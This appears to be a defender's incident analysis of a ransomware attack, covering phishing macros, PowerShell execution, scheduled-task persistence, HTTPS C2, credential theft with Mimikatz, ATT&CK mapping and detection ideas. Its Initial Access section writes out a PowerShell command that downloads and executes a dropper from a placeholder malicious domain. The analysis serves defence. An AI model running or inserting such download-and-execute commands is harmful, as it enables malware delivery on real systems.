Deep Dive into Recent Ransomware Attack: Analyzing the Attack Vector and Threat Actor TTPs

Daniel Osei — SOC Lead & Malware Analyst

Key Takeaways

• The observed ransomware attack utilized a phishing email as the initial access vector.
• Execution mechanisms involved PowerShell scripts alongside a sophisticated loader to deploy the malicious payload.
• Command and control communications leveraged encrypted channels and exfiltrated data to remote servers.

Executive Summary

During a recent investigation into a ransomware incident, we observed that the attack followed a well-defined kill chain, utilizing known techniques and tactics prevalent among contemporary threat actors. Our analysis revealed a sophisticated approach that involved multiple layers of obfuscation and persistence mechanisms, ultimately leading to extensive data encryption and demands for ransom. As cybersecurity professionals, understanding the intricate details of this attack vector is crucial for enhancing defensive measures and mitigation strategies.

Initial Access

The initial access vector for the attack was identified as a phishing email containing a malicious attachment. In our review of the email headers and the attachment, we noted that the file was a .doc macro that, when enabled, executed a PowerShell script. This script was designed to download the dropper file from a remote server. The command executed was Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious-domain.com/dropper.js'). This use of a PowerShell script is indicative of the attacker’s preference for exploiting built-in Windows functionalities to evade detection.

Execution & Persistence

Upon execution, the dropper established persistence through the creation of a scheduled task. The task was named TaskSchedulerUpdater and configured to run every hour, effectively ensuring the malware remains on the system even after a reboot. We observed that the dropper decompressed the main payload into a temporary directory, specifically C:\Windows\Temp\. Following this, it initiated an execution chain that utilized a combination of scramblers to encrypt its code, further complicating static analysis efforts. Our analysis of the malware payload disclosed that it employed a variant of the locky ransomware, characterized by its ability to encrypt files using strong AES encryption.

Command and Control

The command and control (C2) architecture was notably sophisticated. The malware established a secure connection to a C2 server using encrypted communications, specifically leveraging HTTPS for all command transmissions, making it difficult for network detection systems to identify malicious traffic. During our traffic analysis, we identified repeated beacons to the domain malicious-domain.com at intervals of approximately 5 minutes. Further investigation revealed that the server was hosted on a platform known for allowing malicious activities, a tactic often employed by actors seeking to minimize operational risk.

Lateral Movement & Discovery

Following successful command and control channel establishment, the malware began lateral movement. Using WMI and PSExec, we tracked several attempts to spread the ransomware across the network. The documents we gathered indicated that the actor sought to identify administrative shares using net view and exploited those shares to execute commands remotely. Moreover, the malware utilized tools such as Mimikatz to extract credentials from memory, thereby facilitating unauthorized access to additional hosts.

Impact & Objectives

The primary objective of this ransomware attack was clear: to encrypt files and demand ransom for decryption keys. During our investigation, we collected various encrypted file samples, and analysis revealed that the extensibility of encrypted files included common business formats such as .xlsx, .docx, and .pptx. The ransom note provided clear instructions for payment in cryptocurrency, specifically Bitcoin, which is a common trend in modern ransomware operations. The attack’s overall disruptiveness led to significant operational downtimes for the affected organization, resulting in economic losses that are still being assessed.

MITRE ATT&CK Mapping

• T1071 – Application Layer Protocol: The malware used HTTPS for C2 communications to evade detection.
• T1059 – Command and Scripting Interpreter: PowerShell scripts were used to execute the dropper and later commands.
• T1086 – PowerShell: The strategy heavily relied on PowerShell for initial access and execution of malicious payloads.

Detection Opportunities

• Monitor for anomalous PowerShell activity and the execution of scripts from unusual directories, such as C:\Windows\Temp\.
• Implement detection rules for scheduled tasks creation involving common names like TaskSchedulerUpdater that are not typical in your environment.
• Analyze network traffic for suspicious outbound connections to known malicious domains, particularly those using encrypted protocols.

Analyst Notes

The patterns observed in this attack align closely with the methodologies employed by ransomware threat actors in recent years. Increased vigilance around email filtering and employee training on recognizing phishing attempts are essential defenses. Additionally, a proactive approach in monitoring for abnormal network behaviors and anomalous scheduled tasks can significantly reduce the window of opportunity for threat actors. Investing in incident response training and tabletop exercises can likewise prepare organizations to respond effectively against similar attacks.

Source: Original Report